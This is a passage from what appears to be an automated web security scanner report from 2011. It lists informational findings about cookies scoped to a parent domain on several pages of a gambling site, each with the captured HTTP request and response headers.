Date: Mon, 16 May 2011 11:47:35 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
X-AspNet-Version: 2.0.50727
Set-Cookie: RegistrationMode=PM; domain=info.crazyscratch.com; expires=Fri, 16-May-2014 11:47:35 GMT; path=/
Set-Cookie: BO=FM; domain=info.crazyscratch.com; expires=Fri, 16-May-2014 11:47:35 GMT; path=/
Set-Cookie: UniqueVisitorID=9BCCE5CA966749482FFECEB2974C1398; domain=info.crazyscratch.com; expires=Fri, 16-May-2014 11:47:35 GMT; path=/
Set-Cookie: LanguageCode=ENG; domain=info.crazyscratch.com; expires=Fri, 16-May-2014 11:47:35 GMT; path=/
Set-Cookie: CountryCode=US; domain=info.crazyscratch.com; expires=Fri, 16-May-2014 11:47:35 GMT; path=/
Set-Cookie: CSITemp=28; domain=info.crazyscratch.com; path=/
Cache-Control: private
Content-Type: text/html; charset=utf-8
Content-Length: 54673


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">

<html id="ctl00_htmlMaster" xmlns="http://www.w3.org/1999/xhtml">
<hea
...[SNIP]...

11.109. http://www.info.crazyscratch.com/ContactUsMail.aspx

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.info.crazyscratch.com
Path:   /ContactUsMail.aspx

Issue detail

The following cookie was issued by the application and is scoped to a parent of the issuing domain: The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /ContactUsMail.aspx HTTP/1.1
Host: www.info.crazyscratch.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: crazyscratchl=ENG; crazyscratchccode=US; crazyscratchp=; crazyscratchlang=English; crazyscratchu=http%3A//www.crazyscratch.com/; CSI_28=EncryptedUniqueVisitorID=9BCCE5CA966749482FFECEB2974C1398&AffiliateID=28&MarketingMaterialID=0&LastUpdate=2011-05-16&AlternateReference=&PlayerAlternateReference=&ProductTypeID=0; UniqueVisitorID=9BCCE5CA966749482FFECEB2974C1398; LanguageCode=ENG; RegistrationMode=PM; BO=FM; CountryCode=US; CSITemp=28; crazyscratcha=; ASP.NET_SessionId=hg30s4bf4mnutp55xmx3ia45; crazyscratchc=GBP;

Response

HTTP/1.1 200 OK
Connection: close
Date: Mon, 16 May 2011 11:47:19 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
X-AspNet-Version: 2.0.50727
Set-Cookie: RegistrationMode=PM; domain=info.crazyscratch.com; expires=Fri, 16-May-2014 11:47:19 GMT; path=/
Set-Cookie: BO=FM; domain=info.crazyscratch.com; expires=Fri, 16-May-2014 11:47:19 GMT; path=/
Set-Cookie: UniqueVisitorID=9BCCE5CA966749482FFECEB2974C1398; domain=info.crazyscratch.com; expires=Fri, 16-May-2014 11:47:19 GMT; path=/
Set-Cookie: LanguageCode=ENG; domain=info.crazyscratch.com; expires=Fri, 16-May-2014 11:47:19 GMT; path=/
Set-Cookie: CountryCode=US; domain=info.crazyscratch.com; expires=Fri, 16-May-2014 11:47:19 GMT; path=/
Set-Cookie: CSITemp=28; domain=info.crazyscratch.com; path=/
Cache-Control: private
Content-Type: text/html; charset=utf-8
Content-Length: 62131


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">

<html id="ctl00_htmlMaster" xmlns="http://www.w3.org/1999/xhtml">
<hea
...[SNIP]...

11.110. http://www.info.crazyscratch.com/ContactUsTel.aspx

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.info.crazyscratch.com
Path:   /ContactUsTel.aspx

Issue detail

The following cookie was issued by the application and is scoped to a parent of the issuing domain: The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /ContactUsTel.aspx HTTP/1.1
Host: www.info.crazyscratch.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: crazyscratchl=ENG; crazyscratchccode=US; crazyscratchp=; crazyscratchlang=English; crazyscratchu=http%3A//www.crazyscratch.com/; CSI_28=EncryptedUniqueVisitorID=9BCCE5CA966749482FFECEB2974C1398&AffiliateID=28&MarketingMaterialID=0&LastUpdate=2011-05-16&AlternateReference=&PlayerAlternateReference=&ProductTypeID=0; UniqueVisitorID=9BCCE5CA966749482FFECEB2974C1398; LanguageCode=ENG; RegistrationMode=PM; BO=FM; CountryCode=US; CSITemp=28; crazyscratcha=; ASP.NET_SessionId=hg30s4bf4mnutp55xmx3ia45; crazyscratchc=GBP;

Response

HTTP/1.1 200 OK
Connection: close
Date: Mon, 16 May 2011 11:47:32 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
X-AspNet-Version: 2.0.50727
Set-Cookie: RegistrationMode=PM; domain=info.crazyscratch.com; expires=Fri, 16-May-2014 11:47:32 GMT; path=/
Set-Cookie: BO=FM; domain=info.crazyscratch.com; expires=Fri, 16-May-2014 11:47:32 GMT; path=/
Set-Cookie: UniqueVisitorID=9BCCE5CA966749482FFECEB2974C1398; domain=info.crazyscratch.com; expires=Fri, 16-May-2014 11:47:32 GMT; path=/
Set-Cookie: LanguageCode=ENG; domain=info.crazyscratch.com; expires=Fri, 16-May-2014 11:47:32 GMT; path=/
Set-Cookie: CountryCode=US; domain=info.crazyscratch.com; expires=Fri, 16-May-2014 11:47:32 GMT; path=/
Set-Cookie: CSITemp=28; domain=info.crazyscratch.com; path=/
Cache-Control: private
Content-Type: text/html; charset=utf-8
Content-Length: 54468


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">

<html id="ctl00_htmlMaster" xmlns="http://www.w3.org/1999/xhtml">
<hea
...[SNIP]...

11.111. http://www.info.crazyscratch.com/FairPlay.aspx

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.info.crazyscratch.com
Path:   /FairPlay.aspx

Issue detail

The following cookie was issued by the application and is scoped to a parent of the issuing domain: The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /FairPlay.aspx HTTP/1.1
Host: www.info.crazyscratch.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: crazyscratchl=ENG; crazyscratchccode=US; crazyscratchp=; crazyscratchlang=English; crazyscratchu=http%3A//www.crazyscratch.com/; CSI_28=EncryptedUniqueVisitorID=9BCCE5CA966749482FFECEB2974C1398&AffiliateID=28&MarketingMaterialID=0&LastUpdate=2011-05-16&AlternateReference=&PlayerAlternateReference=&ProductTypeID=0; UniqueVisitorID=9BCCE5CA966749482FFECEB2974C1398; LanguageCode=ENG; RegistrationMode=PM; BO=FM; CountryCode=US; CSITemp=28; crazyscratcha=; ASP.NET_SessionId=hg30s4bf4mnutp55xmx3ia45; crazyscratchc=GBP;

Response

HTTP/1.1 200 OK
Connection: close
Date: Mon, 16 May 2011 11:47:55 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
X-AspNet-Version: 2.0.50727
Set-Cookie: RegistrationMode=PM; domain=info.crazyscratch.com; expires=Fri, 16-May-2014 11:47:55 GMT; path=/
Set-Cookie: BO=FM; domain=info.crazyscratch.com; expires=Fri, 16-May-2014 11:47:55 GMT; path=/
Set-Cookie: UniqueVisitorID=9BCCE5CA966749482FFECEB2974C1398; domain=info.crazyscratch.com; expires=Fri, 16-May-2014 11:47:55 GMT; path=/
Set-Cookie: LanguageCode=ENG; domain=info.crazyscratch.com; expires=Fri, 16-May-2014 11:47:55 GMT; path=/
Set-Cookie: CountryCode=US; domain=info.crazyscratch.com; expires=Fri, 16-May-2014 11:47:55 GMT; path=/
Set-Cookie: CSITemp=28; domain=info.crazyscratch.com; path=/
Cache-Control: private
Content-Type: text/html; charset=utf-8
Content-Length: 56284


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">

<html id="ctl00_htmlMaster" xmlns="http://www.w3.org/1999/xhtml">
<hea
...[SNIP]...

11.112. http://www.info.crazyscratch.com/Help.aspx

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.info.crazyscratch.com
Path:   /Help.aspx

Issue detail

The following cookie was issued by the application and is scoped to a parent of the issuing domain: The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /Help.aspx HTTP/1.1
Host: www.info.crazyscratch.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: crazyscratchl=ENG; crazyscratchccode=US; crazyscratchp=; crazyscratchlang=English; crazyscratchu=http%3A//www.crazyscratch.com/; CSI_28=EncryptedUniqueVisitorID=9BCCE5CA966749482FFECEB2974C1398&AffiliateID=28&MarketingMaterialID=0&LastUpdate=2011-05-16&AlternateReference=&PlayerAlternateReference=&ProductTypeID=0; UniqueVisitorID=9BCCE5CA966749482FFECEB2974C1398; LanguageCode=ENG; RegistrationMode=PM; BO=FM; CountryCode=US; CSITemp=28; crazyscratcha=; ASP.NET_SessionId=hg30s4bf4mnutp55xmx3ia45; crazyscratchc=GBP;

Response

HTTP/1.1 200 OK
Connection: close
Date: Mon, 16 May 2011 11:47:05 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
X-AspNet-Version: 2.0.50727
Set-Cookie: RegistrationMode=PM; domain=info.crazyscratch.com; expires=Fri, 16-May-2014 11:47:05 GMT; path=/
Set-Cookie: BO=FM; domain=info.crazyscratch.com; expires=Fri, 16-May-2014 11:47:05 GMT; path=/
Set-Cookie: UniqueVisitorID=9BCCE5CA966749482FFECEB2974C1398; domain=info.crazyscratch.com; expires=Fri, 16-May-2014 11:47:05 GMT; path=/
Set-Cookie: LanguageCode=ENG; domain=info.crazyscratch.com; expires=Fri, 16-May-2014 11:47:05 GMT; path=/
Set-Cookie: CountryCode=US; domain=info.crazyscratch.com; expires=Fri, 16-May-2014 11:47:05 GMT; path=/
Set-Cookie: CSITemp=28; domain=info.crazyscratch.com; path=/
Cache-Control: private
Content-Type: text/html; charset=utf-8
Content-Length: 55533


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">

<html id="ctl00_htmlMaster" xmlns="http://www.w3.org/1999/xhtml">
<hea
...[SNIP]...

11.113. http://www.info.crazyscratch.com/InviteFriend.aspx

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.info.crazyscratch.com
Path:   /InviteFriend.aspx

Issue detail

The following cookie was issued by the application and is scoped to a parent of the issuing domain: The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /InviteFriend.aspx HTTP/1.1
Host: www.info.crazyscratch.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: crazyscratchl=ENG; crazyscratchccode=US; crazyscratchp=; crazyscratchlang=English; crazyscratchu=http%3A//www.crazyscratch.com/; CSI_28=EncryptedUniqueVisitorID=9BCCE5CA966749482FFECEB2974C1398&AffiliateID=28&MarketingMaterialID=0&LastUpdate=2011-05-16&AlternateReference=&PlayerAlternateReference=&ProductTypeID=0; UniqueVisitorID=9BCCE5CA966749482FFECEB2974C1398; LanguageCode=ENG; RegistrationMode=PM; BO=FM; CountryCode=US; CSITemp=28; crazyscratcha=; ASP.NET_SessionId=hg30s4bf4mnutp55xmx3ia45; crazyscratchc=GBP;

Response

HTTP/1.1 200 OK
Connection: close
Date: Mon, 16 May 2011 11:46:44 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
X-AspNet-Version: 2.0.50727
Set-Cookie: RegistrationMode=PM; domain=info.crazyscratch.com; expires=Fri, 16-May-2014 11:46:44 GMT; path=/
Set-Cookie: BO=FM; domain=info.crazyscratch.com; expires=Fri, 16-May-2014 11:46:44 GMT; path=/
Set-Cookie: UniqueVisitorID=9BCCE5CA966749482FFECEB2974C1398; domain=info.crazyscratch.com; expires=Fri, 16-May-2014 11:46:44 GMT; path=/
Set-Cookie: LanguageCode=ENG; domain=info.crazyscratch.com; expires=Fri, 16-May-2014 11:46:44 GMT; path=/
Set-Cookie: CountryCode=US; domain=info.crazyscratch.com; expires=Fri, 16-May-2014 11:46:44 GMT; path=/
Set-Cookie: CSITemp=28; domain=info.crazyscratch.com; path=/
Cache-Control: private
Content-Type: text/html; charset=utf-8
Content-Length: 66913


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">

<html id="ctl00_htmlMaster" xmlns="http://www.w3.org/1999/xhtml">
<hea
...[SNIP]...

11.114. http://www.info.crazyscratch.com/PlayersClub.aspx

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.info.crazyscratch.com
Path:   /PlayersClub.aspx

Issue detail

The following cookie was issued by the application and is scoped to a parent of the issuing domain: The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /PlayersClub.aspx HTTP/1.1
Host: www.info.crazyscratch.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: crazyscratchl=ENG; crazyscratchccode=US; crazyscratchp=; crazyscratchlang=English; crazyscratchu=http%3A//www.crazyscratch.com/; CSI_28=EncryptedUniqueVisitorID=9BCCE5CA966749482FFECEB2974C1398&AffiliateID=28&MarketingMaterialID=0&LastUpdate=2011-05-16&AlternateReference=&PlayerAlternateReference=&ProductTypeID=0; UniqueVisitorID=9BCCE5CA966749482FFECEB2974C1398; LanguageCode=ENG; RegistrationMode=PM; BO=FM; CountryCode=US; CSITemp=28; crazyscratcha=; ASP.NET_SessionId=hg30s4bf4mnutp55xmx3ia45; crazyscratchc=GBP;

Response

HTTP/1.1 200 OK
Connection: close
Date: Mon, 16 May 2011 11:46:54 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
X-AspNet-Version: 2.0.50727
Set-Cookie: RegistrationMode=PM; domain=info.crazyscratch.com; expires=Fri, 16-May-2014 11:46:54 GMT; path=/
Set-Cookie: BO=FM; domain=info.crazyscratch.com; expires=Fri, 16-May-2014 11:46:54 GMT; path=/
Set-Cookie: UniqueVisitorID=9BCCE5CA966749482FFECEB2974C1398; domain=info.crazyscratch.com; expires=Fri, 16-May-2014 11:46:54 GMT; path=/
Set-Cookie: LanguageCode=ENG; domain=info.crazyscratch.com; expires=Fri, 16-May-2014 11:46:54 GMT; path=/
Set-Cookie: CountryCode=US; domain=info.crazyscratch.com; expires=Fri, 16-May-2014 11:46:54 GMT; path=/
Set-Cookie: CSITemp=28; domain=info.crazyscratch.com; path=/
Cache-Control: private
Content-Type: text/html; charset=utf-8
Content-Length: 63382


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">

<html id="ctl00_htmlMaster" xmlns="http://www.w3.org/1999/xhtml">
<hea
...[SNIP]...

11.115. http://www.info.crazyscratch.com/Privacy.aspx

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.info.crazyscratch.com
Path:   /Privacy.aspx

Issue detail

The following cookie was issued by the application and is scoped to a parent of the issuing domain: The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /Privacy.aspx HTTP/1.1
Host: www.info.crazyscratch.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: crazyscratchl=ENG; crazyscratchccode=US; crazyscratchp=; crazyscratchlang=English; crazyscratchu=http%3A//www.crazyscratch.com/; CSI_28=EncryptedUniqueVisitorID=9BCCE5CA966749482FFECEB2974C1398&AffiliateID=28&MarketingMaterialID=0&LastUpdate=2011-05-16&AlternateReference=&PlayerAlternateReference=&ProductTypeID=0; UniqueVisitorID=9BCCE5CA966749482FFECEB2974C1398; LanguageCode=ENG; RegistrationMode=PM; BO=FM; CountryCode=US; CSITemp=28; crazyscratcha=; ASP.NET_SessionId=hg30s4bf4mnutp55xmx3ia45; crazyscratchc=GBP;

Response

HTTP/1.1 200 OK
Connection: close
Date: Mon, 16 May 2011 11:47:37 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
X-AspNet-Version: 2.0.50727
Set-Cookie: RegistrationMode=PM; domain=info.crazyscratch.com; expires=Fri, 16-May-2014 11:47:37 GMT; path=/
Set-Cookie: BO=FM; domain=info.crazyscratch.com; expires=Fri, 16-May-2014 11:47:37 GMT; path=/
Set-Cookie: UniqueVisitorID=9BCCE5CA966749482FFECEB2974C1398; domain=info.crazyscratch.com; expires=Fri, 16-May-2014 11:47:37 GMT; path=/
Set-Cookie: LanguageCode=ENG; domain=info.crazyscratch.com; expires=Fri, 16-May-2014 11:47:37 GMT; path=/
Set-Cookie: CountryCode=US; domain=info.crazyscratch.com; expires=Fri, 16-May-2014 11:47:37 GMT; path=/
Set-Cookie: CSITemp=28; domain=info.crazyscratch.com; path=/
Cache-Control: private
Content-Type: text/html; charset=utf-8
Content-Length: 65527


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">

<html id="ctl00_htmlMaster" xmlns="http://www.w3.org/1999/xhtml">
<hea
...[SNIP]...

11.116. http://www.info.crazyscratch.com/Promotions.aspx

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.info.crazyscratch.com
Path:   /Promotions.aspx

Issue detail

The following cookie was issued by the application and is scoped to a parent of the issuing domain: The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /Promotions.aspx HTTP/1.1
Host: www.info.crazyscratch.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: crazyscratchl=ENG; crazyscratchccode=US; crazyscratchp=; crazyscratchlang=English; crazyscratchu=http%3A//www.crazyscratch.com/; CSI_28=EncryptedUniqueVisitorID=9BCCE5CA966749482FFECEB2974C1398&AffiliateID=28&MarketingMaterialID=0&LastUpdate=2011-05-16&AlternateReference=&PlayerAlternateReference=&ProductTypeID=0; UniqueVisitorID=9BCCE5CA966749482FFECEB2974C1398; LanguageCode=ENG; RegistrationMode=PM; BO=FM; CountryCode=US; CSITemp=28; crazyscratcha=; ASP.NET_SessionId=hg30s4bf4mnutp55xmx3ia45; crazyscratchc=GBP;

Response

HTTP/1.1 200 OK
Connection: close
Date: Mon, 16 May 2011 11:46:46 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
X-AspNet-Version: 2.0.50727
Set-Cookie: RegistrationMode=PM; domain=info.crazyscratch.com; expires=Fri, 16-May-2014 11:46:46 GMT; path=/
Set-Cookie: BO=FM; domain=info.crazyscratch.com; expires=Fri, 16-May-2014 11:46:46 GMT; path=/
Set-Cookie: UniqueVisitorID=9BCCE5CA966749482FFECEB2974C1398; domain=info.crazyscratch.com; expires=Fri, 16-May-2014 11:46:46 GMT; path=/
Set-Cookie: LanguageCode=ENG; domain=info.crazyscratch.com; expires=Fri, 16-May-2014 11:46:46 GMT; path=/
Set-Cookie: CountryCode=US; domain=info.crazyscratch.com; expires=Fri, 16-May-2014 11:46:46 GMT; path=/
Set-Cookie: CSITemp=28; domain=info.crazyscratch.com; path=/
Cache-Control: private
Content-Type: text/html; charset=utf-8
Content-Length: 57682


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">

<html id="ctl00_htmlMaster" xmlns="http://www.w3.org/1999/xhtml">
<hea
...[SNIP]...

11.117. http://www.info.crazyscratch.com/Responsible.aspx

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.info.crazyscratch.com
Path:   /Responsible.aspx

Issue detail

The following cookie was issued by the application and is scoped to a parent of the issuing domain: The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /Responsible.aspx HTTP/1.1
Host: www.info.crazyscratch.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: crazyscratchl=ENG; crazyscratchccode=US; crazyscratchp=; crazyscratchlang=English; crazyscratchu=http%3A//www.crazyscratch.com/; CSI_28=EncryptedUniqueVisitorID=9BCCE5CA966749482FFECEB2974C1398&AffiliateID=28&MarketingMaterialID=0&LastUpdate=2011-05-16&AlternateReference=&PlayerAlternateReference=&ProductTypeID=0; UniqueVisitorID=9BCCE5CA966749482FFECEB2974C1398; LanguageCode=ENG; RegistrationMode=PM; BO=FM; CountryCode=US; CSITemp=28; crazyscratcha=; ASP.NET_SessionId=hg30s4bf4mnutp55xmx3ia45; crazyscratchc=GBP;

Response

HTTP/1.1 200 OK
Connection: close
Date: Mon, 16 May 2011 11:47:50 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
X-AspNet-Version: 2.0.50727
Set-Cookie: RegistrationMode=PM; domain=info.crazyscratch.com; expires=Fri, 16-May-2014 11:47:50 GMT; path=/
Set-Cookie: BO=FM; domain=info.crazyscratch.com; expires=Fri, 16-May-2014 11:47:50 GMT; path=/
Set-Cookie: UniqueVisitorID=9BCCE5CA966749482FFECEB2974C1398; domain=info.crazyscratch.com; expires=Fri, 16-May-2014 11:47:50 GMT; path=/
Set-Cookie: LanguageCode=ENG; domain=info.crazyscratch.com; expires=Fri, 16-May-2014 11:47:50 GMT; path=/
Set-Cookie: CountryCode=US; domain=info.crazyscratch.com; expires=Fri, 16-May-2014 11:47:50 GMT; path=/
Set-Cookie: CSITemp=28; domain=info.crazyscratch.com; path=/
Cache-Control: private
Content-Type: text/html; charset=utf-8
Content-Length: 61089


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">

<html id="ctl00_htmlMaster" xmlns="http://www.w3.org/1999/xhtml">
<hea
...[SNIP]...

11.118. http://www.info.crazyscratch.com/Terms.aspx

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.info.crazyscratch.com
Path:   /Terms.aspx

Issue detail

The following cookie was issued by the application and is scoped to a parent of the issuing domain: The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /Terms.aspx HTTP/1.1
Host: www.info.crazyscratch.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: crazyscratchl=ENG; crazyscratchccode=US; crazyscratchp=; crazyscratchlang=English; crazyscratchu=http%3A//www.crazyscratch.com/; CSI_28=EncryptedUniqueVisitorID=9BCCE5CA966749482FFECEB2974C1398&AffiliateID=28&MarketingMaterialID=0&LastUpdate=2011-05-16&AlternateReference=&PlayerAlternateReference=&ProductTypeID=0; UniqueVisitorID=9BCCE5CA966749482FFECEB2974C1398; LanguageCode=ENG; RegistrationMode=PM; BO=FM; CountryCode=US; CSITemp=28; crazyscratcha=; ASP.NET_SessionId=hg30s4bf4mnutp55xmx3ia45; crazyscratchc=GBP;

Response

HTTP/1.1 200 OK
Connection: close
Date: Mon, 16 May 2011 11:47:37 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
X-AspNet-Version: 2.0.50727
Set-Cookie: RegistrationMode=PM; domain=info.crazyscratch.com; expires=Fri, 16-May-2014 11:47:37 GMT; path=/
Set-Cookie: BO=FM; domain=info.crazyscratch.com; expires=Fri, 16-May-2014 11:47:37 GMT; path=/
Set-Cookie: UniqueVisitorID=9BCCE5CA966749482FFECEB2974C1398; domain=info.crazyscratch.com; expires=Fri, 16-May-2014 11:47:37 GMT; path=/
Set-Cookie: LanguageCode=ENG; domain=info.crazyscratch.com; expires=Fri, 16-May-2014 11:47:37 GMT; path=/
Set-Cookie: CountryCode=US; domain=info.crazyscratch.com; expires=Fri, 16-May-2014 11:47:37 GMT; path=/
Set-Cookie: CSITemp=28; domain=info.crazyscratch.com; path=/
Cache-Control: private
Content-Type: text/html; charset=utf-8
Content-Length: 117943


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">

<html id="ctl00_htmlMaster" xmlns="http://www.w3.org/1999/xhtml">
<hea
...[SNIP]...

11.119. http://www.info.crazyscratch.com/UnderAge.aspx

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.info.crazyscratch.com
Path:   /UnderAge.aspx

Issue detail

The following cookie was issued by the application and is scoped to a parent of the issuing domain. The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /UnderAge.aspx HTTP/1.1
Host: www.info.crazyscratch.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: crazyscratchl=ENG; crazyscratchccode=US; crazyscratchp=; crazyscratchlang=English; crazyscratchu=http%3A//www.crazyscratch.com/; CSI_28=EncryptedUniqueVisitorID=9BCCE5CA966749482FFECEB2974C1398&AffiliateID=28&MarketingMaterialID=0&LastUpdate=2011-05-16&AlternateReference=&PlayerAlternateReference=&ProductTypeID=0; UniqueVisitorID=9BCCE5CA966749482FFECEB2974C1398; LanguageCode=ENG; RegistrationMode=PM; BO=FM; CountryCode=US; CSITemp=28; crazyscratcha=; ASP.NET_SessionId=hg30s4bf4mnutp55xmx3ia45; crazyscratchc=GBP;

Response

HTTP/1.1 200 OK
Connection: close
Date: Mon, 16 May 2011 11:48:09 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
X-AspNet-Version: 2.0.50727
Set-Cookie: RegistrationMode=PM; domain=info.crazyscratch.com; expires=Fri, 16-May-2014 11:48:09 GMT; path=/
Set-Cookie: BO=FM; domain=info.crazyscratch.com; expires=Fri, 16-May-2014 11:48:09 GMT; path=/
Set-Cookie: UniqueVisitorID=9BCCE5CA966749482FFECEB2974C1398; domain=info.crazyscratch.com; expires=Fri, 16-May-2014 11:48:09 GMT; path=/
Set-Cookie: LanguageCode=ENG; domain=info.crazyscratch.com; expires=Fri, 16-May-2014 11:48:09 GMT; path=/
Set-Cookie: CountryCode=US; domain=info.crazyscratch.com; expires=Fri, 16-May-2014 11:48:09 GMT; path=/
Set-Cookie: CSITemp=28; domain=info.crazyscratch.com; path=/
Cache-Control: private
Content-Type: text/html; charset=utf-8
Content-Length: 54259


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">

<html id="ctl00_htmlMaster" xmlns="http://www.w3.org/1999/xhtml">
<hea
...[SNIP]...

11.120. http://www.info.crazyscratch.com/visit.aspx

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.info.crazyscratch.com
Path:   /visit.aspx

Issue detail

The following cookies were issued by the application and are scoped to a parent of the issuing domain. The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /visit.aspx?CSI=28&CUR=GBP&CurrencyCode=GBP&LanguageCode=ENG&&&CorID=&SentDate= HTTP/1.1
Host: www.info.crazyscratch.com
Proxy-Connection: keep-alive
Referer: http://www.crazyscratch.com/
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.68 Safari/534.24
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: crazyscratchccode=US; crazyscratcha=; crazyscratchp=; crazyscratchl=ENG; crazyscratchc=GBP; crazyscratchu=http%3A//www.crazyscratch.com/; crazyscratchlang=English

Response

HTTP/1.1 200 OK
Cache-Control: private
Date: Mon, 16 May 2011 11:41:36 GMT
Content-Type: text/html; charset=utf-8
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
X-AspNet-Version: 2.0.50727
p3p: CP="IDC DSP COR ADM DEVi TAIi PSA PSD IVAi IVDi CONi HIS OUR IND CNT"
Set-Cookie: ASP.NET_SessionId=4hx2gq45wfk4h4454gql45vw; path=/; HttpOnly
Set-Cookie: CSI_28=EncryptedUniqueVisitorID=0AE4A8ABEB81FBA6A39669E9D12F4EF0&AffiliateID=28&MarketingMaterialID=0&LastUpdate=2011-05-16&AlternateReference=&PlayerAlternateReference=&ProductTypeID=0; domain=info.crazyscratch.com; expires=Fri, 16-May-2031 11:41:36 GMT; path=/
Set-Cookie: RegistrationMode=PM; domain=info.crazyscratch.com; expires=Fri, 16-May-2014 11:41:36 GMT; path=/
Set-Cookie: BO=FM; domain=info.crazyscratch.com; expires=Fri, 16-May-2014 11:41:36 GMT; path=/
